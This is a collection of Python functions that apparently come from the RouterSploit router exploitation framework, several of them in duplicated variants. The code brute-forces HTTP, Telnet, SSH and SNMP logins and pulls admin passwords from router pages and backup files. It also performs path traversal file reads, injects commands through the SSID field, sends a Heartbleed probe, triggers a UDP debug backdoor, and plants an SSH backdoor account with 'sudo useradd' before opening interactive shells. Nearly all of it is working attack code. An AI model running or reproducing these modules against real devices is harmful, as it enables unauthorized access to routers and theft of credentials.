def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = itertools.product(usernames, passwords) with threads.ThreadPoolExecutor(self.threads) as executor: for record in collection: executor.submit(self.target_function, url, record) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port)) print_status("Running module...") try: r = requests.get(url) res = r.text except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return try: data = json.loads(res) print_status("Decoding JSON value") except ValueError: print_error("Response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def hit_hb(self, s): while True: typ, ver, pay = self.recvmsg(s) if typ is None: print_error( "No heartbeat response received, server likely not vulnerable" ) return False if typ == 24: print_status("Received heartbeat response") self.hexdump(pay) if len(pay) > 3: print_success( "WARNING: server returned more data than it should - server is vulnerable!" ) else: print_error( "Server processed malformed heartbeat, but did not return any extra data." ) return if typ == 21: print_error("Server returned error, likely not vulnerable") print_error("Exploit failed") return
def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(10.0) s.connect((self.target, int(self.port))) s.send(self.h2bin(self.hello)) except Exception: print_error("Connection failed: {}:{}".format(self.target, self.port)) return while True: typ, ver, pay = self.recvmsg(s) if typ is None: print_error("Server closed connection without sending Server Hello.") print_error("Exploit failed") return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print_status("Sending heartbeat request") s.send(self.h2bin(self.hb)) self.hit_hb(s)
def run(self): if self.check(): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '******'")] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) if len(res): creds.append((regexp[0], b64decode(res[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found") else: print_error("Device seems to be not vulnerable")
def run(self): creds = [] url = "{}:{}/password.cgi".format(self.target, self.port) print_status("Requesting {}".format(url)) response = http_request(method="GET", url=url) if response is None: print_error("Exploit failed - empty response") return tokens = [ ("admin", r"pwdAdmin = '(.+?)'"), ("support", r"pwdSupport = '(.+?)'"), ("user", r"pwdUser = '******'") ] print_status("Trying to extract credentials") for token in tokenize(tokens, response.text): creds.append((token.typ, token.value[-1])) if creds: print_success("Credentials found") print_table(("Login", "Password"), *creds) else: print_error("Exploit failed - credentials could not be found")
def run(self): rootpath = 'routersploit/modules/' path = 'exploits/dlink/' # only py exploit files modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"] vulns = [] for module_name in modules: f = path + module_name module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() exploit.target = self.target exploit.port = self.port res = exploit.check() if res is True: print_success("{} is vulnerable".format(f)) vulns.append(f) elif res is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) print if len(vulns): print_success("Device is vulnerable!") for v in vulns: print " - {}".format(v) else: print_error("Device is not vulnerable to any exploits!") print
def inject_command(self): ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port) response = http_request(method="GET", url=ssid_url) if response is None: print_error("Exploit failed. No response from target!") return srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text) if srcSSID: SSID = srcSSID.group(1) else: print_error("Exploit failed. Are you logged in?") return if len(SSID) + 2 + len(self.cmd) > 32: newlen = 32 - len(self.cmd) - 2 SSID = SSID[0:newlen] print_status("SSID too long, it will be truncated to: " + SSID) newSSID = SSID + "%3B" + self.cmd + "%3B" payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid=" + newSSID + "&arc_action=Apply+Changes&wchan=1&ssid=" + newSSID url = "{}:{}/apply.cgi".format(self.target, self.port) response = http_request(method="POST", url=url, data=payload) if response is None: print_error("Exploit failed. No response from target!") return err = re.search('countdown\(55\);', response.text) if err: print_success("Exploit success, wait until router reboot.") else: print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Dumping configuration...") print_info(self.content) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): self.vulnerabilities = [] self.not_verified = [] target = utils.safe_json_loads(self.target) if target: self.target = target with threads.ThreadPoolExecutor(self.threads) as executor: for directory in self._exploits_directories: for exploit in utils.iter_modules(directory): executor.submit(self.target_function, exploit) print_info() if self.not_verified: print_status("Could not verify exploitability:") for v in self.not_verified: print_info(" - {}".format(v)) print_info() if self.vulnerabilities: print_success("Device is vulnerable:") for v in self.vulnerabilities: print_info(" - {}".format(v)) print_info() else: print_error("Could not confirm any vulnerablity\n")
def run(self): try: print_status("Trying to authenticate to the telnet server") tn = telnetlib.Telnet(self.target, 23) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) if i != -1: print_error("Exploit failed") else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Authentication successful") tn.write("\r\n") tn.interact() else: print_error("Exploit failed") tn.close() except: print_error("Connection error {}:23".format(self.target))
def run(self): creds = [] url = "{}:{}/backupsettings.conf".format(self.target, self.port) response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass)) if response is None: print_error("Exploit failed") return res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text) if len(res): print_success("Found strings: {}".format(res[0])) try: print_status("Trying to base64 decode") password = base64.b64decode(res[0]) except Exception: print_error("Exploit failed - could not decode password") return creds.append(("admin", password)) print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")
def run(self): print_status("Running module...") self.credentials = [] url = sanitize_url("{}:{}".format(self.target, self.port)) try: r = requests.get(url) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return if r.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10.0) print_status("Sending backdoor packet...") response = "" try: sock.sendto("HELODBG", (self.target, 39889)) response = sock.recv(1024) except Exception: pass sock.close() if "Hello" in response: print_success("Target seems to vulnerable") print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port)) try: tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) tn.interact() except Exception: print_error("Exploit failed - could not connect to the telnet service") else: print_error("Exploit failed - target seems to be not vulnerable")
def create_ssh_backdoor(self, username, password): url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format( self.target, self.port) sh_name = 'exploit.sh' sf_action_id = self.get_sf_action_id() payload = "sudo useradd -g ldapgroup -p `openssl passwd -1 {}` {}; rm /var/sf/SRU/{}".format( password, username, sh_name) print_status("Attempting to create SSH backdoor") multipart_form_data = { "action_submit": (None, "Import"), "source": (None, "file"), "manual_update": (None, "1"), "sf_action_id": (None, sf_action_id), "file": (sh_name, payload) } try: http_request(method="POST", url=url, files=multipart_form_data, session=self.session) except Exception: pass return
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, "thread is starting...", verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() except StopIteration: break else: retries = 0 while retries < 3: try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) tn.close() if i != -1: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format( self.target, self.port, name, user, password ), verbose=module_verbosity, ) else: if ( any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500 ): # big banner e.g. mikrotik if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format( self.target, self.port, name, user, password ), verbose=module_verbosity, ) self.credentials.append((self.target, self.port, user, password)) tn.close() break except EOFError: print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) retries += 1 if retries > 2: print_error("Too much connection problems. Quiting...", verbose=module_verbosity) return continue print_status(name, "thread is terminated.", verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error(name, err, "Username: '******' Password: '******'".format(user, password), verbose=module_verbosity) else: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] print_status("Running module...") ssh = paramiko.SSHClient() try: ssh.connect(self.target, port=self.port) except socket.error: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ssh.close() return except: pass ssh.close() if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Digest Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] with ThreadPoolExecutor(self.threads) as executor: for record in defaults: username, password = record.split(':') executor.submit(self.target_function, url, username, password) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") self.command_loop() else: print_error("Target is not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() except StopIteration: break else: retries = 0 while retries < 3: try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) tn.close() if i != -1: print_error(name, "Username: '******' Password: '******'".format( user, password), verbose=module_verbosity) else: if any(map(lambda x: x in res, [ "#", "$", ">" ])) or len(res) > 500: # big banner e.g. mikrotik running.clear() print_success( "{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) tn.close() break except EOFError: print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return continue print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return creds = [] admin = re.findall("pwdAdmin = '(.+?)'", response.text) if len(admin): creds.append(('Admin', b64decode(admin[0]))) support = re.findall("pwdSupport = '(.+?)'", response.text) if len(support): creds.append(('Support', b64decode(support[0]))) user = re.findall("pwdUser = '******'", response.text) if len(user): creds.append(('User', b64decode(user[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found")
def run(self): if self.check(): print_success("Target seems to be vulnerable") file_path = "..{}".format(self.filename) url = "{}:{}/apply.cgi".format(self.target, self.port) data = {"html_response_page": file_path, "action": "do_graph_auth", "login_name": "test", "login_pass": "******", "&login_n": "test2", "log_pass": "******", "graph_code": "63778", "session_id": "test5", "test": "test"} print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password)) response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return if response.status_code == 200: print_status("File: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read response") else: print_error("Exploit failed - target seems to be not vulnerable")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): url = sanitize_url( "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703" .format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return try: print_status("Decoding JSON") data = json.loads(response.text) except ValueError: print_error("Exploit failed - response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].encode('utf-8').strip() password = line[1].encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response = http_request(method="POST", url=url, data=data) if response is None: return if response.status_code == 200: print_success("Exploit success") print_status("File: {}".format(self.filename)) print response.text else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsle") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): vulnerabilities = [] for exploit in utils.iter_modules(utils.EXPLOITS_DIR): exploit = exploit() exploit.target = self.target exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(exploit)) vulnerabilities.append(exploit) elif response is False: print_error("{} is not vulnerable".format(exploit)) else: print_status("{} could not be verified".format(exploit)) if vulnerabilities: print_info() print_success("Device is vulnerable!") for v in vulnerabilities: print_info(" - {}".format(v)) else: print_error("Device is not vulnerable to any exploits!\n")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name address = "{}:{}".format(self.target, self.port) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: string = data.next().strip() bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0") res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string) if res[0] is not None: running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) else: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string), cmdgen.UdpTransportTarget((self.target, int(self.port))), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsel", method="wget", binary="wget", location="/var") else: print_error("Target is not vulnerable")
def login(self): url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) data = { "username": self.username, "password": self.password, "target": "" } print_status("Trying to authenticate") response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session) if response is None: return False if response.status_code == 302 and "CGISESSID" in response.cookies.keys( ): print_status("CGI Session ID: {}".format( response.cookies['CGISESSID'])) print_success("Authenticated as {}:{}".format( self.username, self.password)) return True print_error("Exploit failed. Could not authenticate.") return False
def run(self): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(self.target, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass except: print_error("Exploit Failed - SSH Service is down") return trans = client.get_transport() try: trans.auth_password(username='******', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass except: print_status("Error with Existing Session. Wait few minutes.") return try: trans.auth_interactive(username='******', handler=self.custom_handler) print_success("Exploit succeeded") ssh_interactive(client) except: print_error("Exploit failed") return
def run(self): try: print_status("Trying to authenticate to the telnet server") tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) if i != -1: print_error("Exploit failed") else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Authentication successful") tn.write("\r\n") tn.interact() else: print_error("Exploit failed") tn.close() except Exception: print_error("Connection error {}:{}".format( self.target, self.telnet_port))
def login(self): url = "{}:{}/".format(self.target, self.port) try: response = self.session.get(url=url) if response is None: return print_status("Retrieving random login token...") Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text) if len(Frm_Logintoken): Frm_Logintoken = Frm_Logintoken[0] print_status("Trying to log in with credentials {} : {}".format(self.username, self.password)) url = "{}:{}/login.gch".format(self.target, self.port) data = {"Frm_Logintoken": Frm_Logintoken, "Username": self.username, "Password": self.password} response = self.session.post(url, data=data) if "Username" not in response.text and "Password" not in response.text: print_success("Successful authentication") return True except: pass return False
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string), cmdgen.UdpTransportTarget((self.target, int(self.port))), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.exit_on_success): running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.target, int(self.port))) s.send(self.h2bin(self.hello)) except: print_error("Connection failed: {}:{}".format( self.target, self.port)) return while True: typ, ver, pay = self.recvmsg(s) if typ == None: print_error( "Server closed connection without sending Server Hello.") print_error("Exploit failed") return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print_status("Sending heartbeat request") s.send(self.h2bin(self.hb)) self.hit_hb(s)
def login(self): url = "{}:{}/".format(self.target, self.port) try: response = self.session.get(url=url) if response is None: return print_status("Retrieving random login token...") Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text) if len(Frm_Logintoken): Frm_Logintoken = Frm_Logintoken[0] print_status( "Trying to log in with credentials {} : {}".format( self.username, self.password)) url = "{}:{}/login.gch".format(self.target, self.port) data = { "Frm_Logintoken": Frm_Logintoken, "Username": self.username, "Password": self.password } response = self.session.post(url, data=data) if "Username" not in response.text and "Password" not in response.text: print_success("Successful authentication") return True except: pass return False
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) else: print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def ftp_get_config(self): print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target, self.ftp_port, self.remote_user, self.remote_pass)) ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.ftp_port), timeout=10) ftp.login(self.remote_user, self.remote_pass) print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port)) if self.config_path in ftp.nlst(): print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path)) r = StringIO() ftp.retrbinary('RETR {}'.format(self.config_path), r.write) ftp.close() data = r.getvalue() creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data) if creds: print_success("Found encrypted credentials:") print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds) return creds else: print_error("Exploit failed - could not find any credentials") except ftplib.all_errors: print_error("Exploit failed - FTP error") return None
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="none", method="awk", binary="awk") else: print_error("Target is not vulnerable")
def run(self): response = self.telnet_login() if 'Login not allowed' in response and self.is_port_opened(self.ftp_port): print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port)) print_status("FTP and HTTP service active") creds = self.ftp_get_config() if creds: print_status("Use javascript console (through developer tools) to bypass authentication:") payload = ('var user = "******"\n' 'var hash2 = "{}";\n' 'var HA2 = MD5("GET" + ":" + uri);\n' 'document.getElementById("user").value = user;\n' 'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n' 'document.authform.submit();\n') for user in creds: print_success("User: {} Role: {}".format(user[0], user[2])) print_info(payload.format(user[0], user[3])) elif '}=>' in response: print_success("Successful authentication through Telnet service") tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10) tn.read_until(': ') tn.write(self.remote_user + '\r\n') tn.read_until(': ') tn.write(self.remote_pass + '\r\n') tn.interact() else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mips") else: print_error("Target is not vulnerable")
def run(self): creds = [] url = "{}:{}/backupsettings.conf".format(self.target, self.port) response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass)) if response is None: print_error("Exploit failed") return res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text) if len(res): print_success("Found strings: {}".format(res[0])) try: print_status("Trying to base64 decode") password = base64.b64decode(res[0]) except: print_error("Exploit failed - could not decode password") return creds.append(("admin", password)) print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")